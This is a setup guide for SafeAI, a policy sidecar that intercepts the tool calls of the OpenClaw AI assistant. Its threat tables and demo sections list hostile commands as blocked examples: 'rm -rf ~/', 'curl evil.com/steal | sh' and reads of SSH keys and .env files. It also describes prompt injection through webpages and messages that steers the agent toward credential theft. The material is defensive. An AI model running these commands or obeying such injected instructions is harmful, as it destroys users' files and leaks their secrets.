Securing OpenClaw with SafeAI¶
OpenClaw is an open-source personal AI assistant that runs locally on your machine. It connects to WhatsApp, Telegram, Slack, Discord, Signal, iMessage, and more — executing real actions like browsing the web, running shell commands, reading and writing files, sending emails via Gmail, and managing GitHub repos.
That power is exactly why it needs SafeAI. An autonomous agent with shell access, file system permissions, and messaging capabilities is one prompt injection away from leaking credentials, sending PII to the wrong chat, or running rm -rf on your home directory.
This guide shows how to secure OpenClaw in 4 commands using SafeAI's intelligence layer — no manual policy writing required.
Why OpenClaw needs guardrails¶
OpenClaw's agent can:
| Capability | Risk |
|---|---|
| Execute shell commands (bash) | rm -rf ~, curl ... \| sh, credential exfil |
| Read/write files | Access .env, ~/.ssh/id_rsa, ~/.aws/credentials |
| Browse the web (Playwright/CDP) | Navigate to phishing pages, leak session cookies |
| Send messages (WhatsApp, Telegram, Slack, etc.) | Forward PII or secrets to unintended recipients |
| Gmail Pub/Sub integration | Read/send email with your real inbox |
| GitHub integration | Push code, create repos, expose tokens |
| Cron jobs and webhooks | Persistent backdoor tasks |
A single prompt injection — via an incoming DM, a webpage the agent visits, or a file it reads — could exploit any of these. SafeAI sits between OpenClaw and these tools to enforce policy at every boundary.
Architecture¶
OpenClaw is a Node.js/TypeScript application. SafeAI is Python. The integration uses SafeAI's REST proxy running as a sidecar — OpenClaw calls SafeAI's HTTP API before and after tool execution.
 User (WhatsApp,       ┌─────────────────┐         ┌──────────────┐
 Telegram, Slack,  ──> │ OpenClaw        │ ──────> │ AI Provider  │
 Discord, etc.)        │ Gateway         │ <────── │ (Claude,     │
                       │ ws://127.0.0.1  │         │  OpenAI)     │
                       │ :18789          │         └──────────────┘
                       │                 │
                       │ Tool calls ─────┼───────> ┌──────────────┐
                       │ (bash, file,    │         │ SafeAI       │
                       │  browser,       │ <────── │ Sidecar      │
                       │  messaging)     │         │ :8484        │
                       └─────────────────┘         └──────────────┘
                                                          │
                                                   Policy Engine
                                                   Audit Logger
                                                   Secret Scanner
                                                   PII Detector
                                                   Intelligence Layer
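To make the request/response flow concrete, here is a minimal JavaScript sketch of the pre-tool hook pattern. The endpoint path (/v1/guard/action) and the decision shape (action, reason, parameters) are illustrative assumptions, not SafeAI's documented API; the generated skill in Step 3 implements the real contract.

```javascript
// Minimal sketch of OpenClaw calling the SafeAI sidecar before a tool runs.
// Endpoint path and response shape below are illustrative assumptions.

// Default transport: POST JSON to the sidecar and parse the JSON decision.
async function defaultPost(url, body) {
  const res = await fetch(url, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(body),
  });
  return res.json();
}

// Returns { proceed, parameters?, reason? } based on the sidecar's decision.
async function guardToolCall(toolName, parameters, post = defaultPost) {
  const decision = await post("http://127.0.0.1:8484/v1/guard/action", {
    tool_name: toolName,
    parameters,
  });
  if (decision.action === "allow") {
    // The sidecar may return sanitized parameters (e.g. with secrets stripped)
    return { proceed: true, parameters: decision.parameters ?? parameters };
  }
  if (decision.action === "require_approval") {
    return { proceed: false, reason: "held for user approval" };
  }
  // Anything else is treated as a block
  return { proceed: false, reason: decision.reason ?? "blocked by policy" };
}
```

The key design point is fail-closed dispatch: only an explicit "allow" lets the tool run; unknown or missing decisions are treated as blocks.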
Step 1 — Install and initialize¶
# Install OpenClaw
npm install -g openclaw@latest
openclaw onboard --install-daemon
# Install SafeAI
uv pip install safeai
# Initialize SafeAI in your workspace
cd ~/openclaw-workspace
safeai init
safeai init scaffolds config files and walks you through an interactive setup:
SafeAI initialized
created: safeai.yaml
created: policies/default.yaml
created: contracts/example.yaml
...
Intelligence Layer Setup
SafeAI can use an AI backend to auto-generate policies,
explain incidents, and recommend improvements.
Enable the intelligence layer? [Y/n]: Y
Choose your AI backend:
1. Ollama (local, free — no API key needed)
2. OpenAI
3. Anthropic
4. Google Gemini
5. Mistral
6. Groq
7. Azure OpenAI
8. Cohere
9. Together AI
10. Fireworks AI
11. DeepSeek
12. Other (any OpenAI-compatible endpoint)
Select provider [1]: 1
Intelligence layer configured!
provider: ollama
model: llama3.2
Next steps:
safeai intelligence auto-config --path . --apply
safeai serve --mode sidecar --port 8484
That's it — no YAML editing needed. The interactive setup writes the intelligence configuration to safeai.yaml for you.
Tip
The AI backend is only used for advisory tasks (generating configs, explaining incidents). It is never in the enforcement loop. SafeAI enforces policies deterministically — no LLM involved at runtime.
Step 2 — Auto-generate policies¶
Let SafeAI's intelligence layer analyze your workspace and generate policies, contracts, and agent identities — all tailored to OpenClaw:
safeai intelligence auto-config --path . --output-dir .safeai-generated
Review what was generated:
ls .safeai-generated/
cat .safeai-generated/policies/*.yaml
Apply when you're satisfied:
safeai intelligence auto-config --path . --apply
The generated policies cover secrets, PII, dangerous commands, sensitive file paths, outbound messaging approvals, and more — all inferred from your project structure.
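As an illustration only, a generated policy rule might take a shape like the following. The field names here are assumptions for demonstration, not SafeAI's documented schema; inspect your own policies/ output rather than copying this.

```
# Hypothetical shape of one generated rule; the rule id "block-sensitive-files"
# appears in SafeAI's own incident output, but the field names are illustrative.
policies:
  - id: block-sensitive-files
    boundary: action
    match:
      tool: file_read
      path_patterns: ["**/.env", "~/.ssh/**", "~/.aws/**"]
    action: block
    reason: "Access to credential files and private keys is denied."
```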
Step 3 — Generate the OpenClaw integration code¶
Let the intelligence layer generate the skill code that wires SafeAI into OpenClaw's tool pipeline:
safeai intelligence integrate --target openclaw --path . --output-dir .safeai-generated
This produces ready-to-use OpenClaw skill files:
ls .safeai-generated/
# skills/safeai-guard/index.js — API client (scanInput, guardOutput, interceptTool)
# skills/safeai-guard/hooks.js — Pre/post hooks with tag inference
Copy them into your OpenClaw workspace by re-running the command with --apply:
safeai intelligence integrate --target openclaw --path . --apply
The generated skill handles:
- Input scanning — every inbound message is checked before the model sees it
- Tool interception — every tool call (bash, file, browser, messaging) is validated against policies
- Output guarding — every model response is scanned for secrets and PII before reaching the user
- Tag inference — automatically tags tool calls as destructive, external, sensitive, etc.
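For intuition, tag inference can be pictured as a rule-based classifier like the sketch below. The specific rules and tool names are assumptions for demonstration; the generated hooks.js carries the real logic.

```javascript
// Illustrative tag-inference sketch. The rule set below is an assumption
// for demonstration, not SafeAI's actual rules.
function inferTags(toolName, parameters = {}) {
  const tags = new Set();
  // Destructive shell patterns: rm -rf and curl-pipe-to-shell
  if (
    toolName === "bash" &&
    /\brm\s+-rf\b|\|\s*(sh|bash)\b/.test(parameters.command ?? "")
  ) {
    tags.add("destructive");
  }
  // Tools that reach outside the machine are tagged external
  if (["send_message", "gmail_send", "browser"].includes(toolName)) {
    tags.add("external");
  }
  // File access touching credential paths is tagged sensitive
  if (
    toolName.startsWith("file_") &&
    /(\.env$|\.ssh\/|\.aws\/)/.test(parameters.path ?? "")
  ) {
    tags.add("sensitive");
  }
  return [...tags];
}
```

Policies can then key off tags rather than individual tools, so one "destructive requires approval" rule covers every tool that earns the tag.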
Step 4 — Start both services¶
# Terminal 1: SafeAI sidecar
safeai serve --mode sidecar --port 8484
# Terminal 2: OpenClaw
openclaw start
That's it. SafeAI is now enforcing policies on every boundary.
See it in action¶
Dangerous shell command blocked¶
A user (or prompt injection) asks the agent to run a destructive command:
{
  "tool_name": "bash",
  "parameters": { "command": "rm -rf ~/" }
}
SafeAI intercepts and blocks:
// → Blocked: "Destructive shell commands are denied by policy."
Credential exfiltration blocked¶
A prompt injection hidden in a webpage tells the agent to read your SSH key:
{
"tool_name": "file_read",
"parameters": { "path": "~/.ssh/id_ed25519" }
}
// → Blocked: "Access to credential files and private keys is denied."
API key in inbound message blocked¶
Someone sends a message containing a secret:
{
"text": "Hey, use this key: sk-proj-abc123def456 for the API"
}
// → Blocked: "Credentials, API keys, and tokens must never cross any boundary."
PII redacted in model response¶
The model generates a response containing a phone number:
{
"text": "I found your contact: John at 555-867-5309 and john@example.com"
}
// → Redacted: "I found your contact: John at [REDACTED] and [REDACTED]"
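Conceptually, the output guard behaves like the regex sketch below. These two patterns are simplifying assumptions for illustration; SafeAI's real PII detector is policy-driven and covers far more than US phone formats and plain email addresses.

```javascript
// Simplified redaction sketch: two illustrative PII patterns, applied in order.
// SafeAI's actual detector is policy-driven, not these regexes.
const PII_PATTERNS = [
  /\b\d{3}-\d{3}-\d{4}\b/g,        // US-style phone numbers, e.g. 555-867-5309
  /\b[\w.+-]+@[\w-]+\.[\w.-]+\b/g, // email addresses
];

// Replace every match of every pattern with a redaction marker.
function redactPII(text) {
  return PII_PATTERNS.reduce((t, re) => t.replace(re, "[REDACTED]"), text);
}
```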
Outbound message requires approval¶
The agent tries to send a WhatsApp message:
{
"tool_name": "send_message",
"parameters": { "channel": "whatsapp", "to": "+1-555-123-4567" }
}
// → Held: "Outbound messages require user approval."
Approve from the CLI:
# List pending approvals, then approve by event id
safeai approvals list
safeai approvals approve <event-id>
Ongoing: AI-powered monitoring¶
Explain security incidents¶
When SafeAI blocks something, use the intelligence layer to understand what happened:
# Find blocked events
safeai logs --action block --last 1h
# Ask the AI to explain
safeai intelligence explain evt_a1b2c3d4
Classification: CREDENTIAL_EXFILTRATION
Severity: CRITICAL
The agent attempted to read ~/.ssh/id_ed25519 via the file_read tool.
This matches a known prompt injection pattern. The "block-sensitive-files"
policy correctly prevented the read.
Suggested remediation:
- Review the conversation history for hidden instructions
- Consider adding the source channel to a watch list
Get policy recommendations¶
After running for a while, let the AI analyze your audit data and suggest improvements:
safeai intelligence recommend --since 7d --output-dir .safeai-generated
Gap Analysis:
- 12 "require_approval" events for send_message but 0 for gmail_send.
Both are external messaging tools — consider the same approval policy.
- No policy covers the "browser" tool's screenshot response field.
Screenshots could contain PII rendered on screen.
Generated file: .safeai-generated/policies/recommended.yaml
Review and apply:
cat .safeai-generated/policies/recommended.yaml
safeai intelligence recommend --since 7d --output-dir .safeai-generated --apply
Generate compliance policies¶
If your OpenClaw deployment handles regulated data:
safeai intelligence compliance --framework hipaa --output-dir .safeai-generated
safeai intelligence compliance --framework gdpr --output-dir .safeai-generated
safeai intelligence compliance --framework soc2 --output-dir .safeai-generated
Metrics and observability¶
The sidecar exports Prometheus-style counters for every boundary decision, so you can see at a glance how often SafeAI allows, blocks, redacts, or holds traffic:
safeai_requests_total{boundary="input",action="block"} 23
safeai_requests_total{boundary="input",action="allow"} 1847
safeai_requests_total{boundary="action",action="block"} 8
safeai_requests_total{boundary="action",action="require_approval"} 12
safeai_requests_total{boundary="output",action="redact"} 156
safeai_requests_total{boundary="output",action="allow"} 2034
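As a quick observability check, you can compute per-boundary block rates from these counters. A small sketch follows; the metric name safeai_requests_total comes from the sample above, while the line-parsing itself is a simplifying assumption about the exposition format.

```javascript
// Parse Prometheus-style counter lines and compute the share of blocked
// requests per boundary. Assumed line format:
//   safeai_requests_total{boundary="input",action="block"} 23
function blockRates(metricsText) {
  const totals = {}; // boundary -> { total, blocked }
  const re = /^safeai_requests_total\{boundary="(\w+)",action="(\w+)"\}\s+(\d+)$/;
  for (const line of metricsText.trim().split("\n")) {
    const m = re.exec(line.trim());
    if (!m) continue; // skip comments and unrelated metrics
    const [, boundary, action, count] = m;
    const t = (totals[boundary] ??= { total: 0, blocked: 0 });
    t.total += Number(count);
    if (action === "block") t.blocked += Number(count);
  }
  // blocked / total for each boundary
  return Object.fromEntries(
    Object.entries(totals).map(([b, t]) => [b, t.blocked / t.total])
  );
}
```

A spike in a boundary's block rate is usually the first sign of an injection attempt worth investigating with safeai logs.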
What SafeAI prevents¶
| Threat | Without SafeAI | With SafeAI |
|---|---|---|
| rm -rf ~/ via prompt injection | Files deleted | Blocked |
| Agent reads ~/.ssh/id_rsa | Private key exposed | Blocked |
| API key in inbound message | Key forwarded to LLM | Blocked |
| Model hallucinates phone number | PII shown to user | Redacted |
| Agent sends WhatsApp autonomously | Message sent without consent | Held for approval |
| git push to public repo | Code pushed without review | Held for approval |
| curl evil.com/steal \| sh | Arbitrary code execution | Blocked |
| Webhook contains leaked API key | Key reaches model context | Blocked |
| Agent reads .env | Env vars exposed | Blocked |
Running as a system service¶
For always-on operation, run SafeAI alongside OpenClaw's daemon. On Linux, register a systemd user service:
cat > ~/.config/systemd/user/safeai.service << 'EOF'
[Unit]
Description=SafeAI Sidecar for OpenClaw
After=network.target
[Service]
# systemd does not search your shell PATH; point ExecStart at the
# absolute path printed by `which safeai` (adjust the path below).
ExecStart=%h/.local/bin/safeai serve --mode sidecar --port 8484
WorkingDirectory=%h/openclaw-workspace
Restart=always
[Install]
WantedBy=default.target
EOF
systemctl --user enable --now safeai
On macOS, install a launchd agent instead:
cat > ~/Library/LaunchAgents/com.safeai.sidecar.plist << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.safeai.sidecar</string>
<key>ProgramArguments</key>
<array>
<!-- launchd ignores your shell PATH; replace with the absolute path from `which safeai` -->
<string>/usr/local/bin/safeai</string>
<string>serve</string>
<string>--mode</string>
<string>sidecar</string>
<string>--port</string>
<string>8484</string>
</array>
<key>WorkingDirectory</key>
<string>/Users/you/openclaw-workspace</string>
<key>KeepAlive</key>
<true/>
</dict>
</plist>
EOF
launchctl load ~/Library/LaunchAgents/com.safeai.sidecar.plist
Summary¶
Securing OpenClaw with SafeAI takes 4 commands:
safeai init # interactive setup
safeai intelligence auto-config --path . --apply # generate policies
safeai intelligence integrate --target openclaw --path . --apply # generate skill
safeai serve --mode sidecar --port 8484 # enforce
No YAML editing. No manual policy writing. The interactive CLI configures your AI backend, the intelligence layer generates everything else — you just review and apply.
Next steps¶
- Intelligence Layer — full guide to AI advisory agents
- Proxy / Sidecar Guide — REST API reference
- Policy Engine — customize generated policies
- Approval Workflows — human-in-the-loop gates
- Audit Logging — query the decision trail
- OpenClaw Documentation — OpenClaw setup and skills